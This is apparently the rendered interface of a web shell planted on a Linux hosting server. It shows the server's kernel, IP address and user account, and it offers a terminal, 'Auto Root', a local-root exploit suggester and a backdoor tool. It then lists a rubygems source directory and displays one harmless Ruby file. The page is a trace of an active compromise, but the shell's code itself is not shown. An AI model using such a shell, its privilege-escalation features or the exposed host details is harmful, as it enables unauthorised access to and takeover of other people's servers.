Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.216.17
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
lib64 /
ruby /
2.6.0 /
rubygems /
source /
Delete
Unzip
Name
Size
Permission
Date
Action
git.rb
5.32
KB
-rw-r--r--
2022-04-12 16:20
installed.rb
663
B
-rw-r--r--
2022-04-12 16:20
local.rb
2.8
KB
-rw-r--r--
2022-04-12 16:20
lock.rb
928
B
-rw-r--r--
2022-04-12 16:20
specific_file.rb
1.48
KB
-rw-r--r--
2022-04-12 16:20
vendor.rb
469
B
-rw-r--r--
2022-04-12 16:20
Save
Rename
# frozen_string_literal: true ## # This represents a vendored source that is similar to an installed gem. class Gem::Source::Vendor < Gem::Source::Installed ## # Creates a new Vendor source for a gem that was unpacked at +path+. def initialize(path) @uri = path end def <=>(other) case other when Gem::Source::Lock then -1 when Gem::Source::Vendor then 0 when Gem::Source then 1 else nil end end end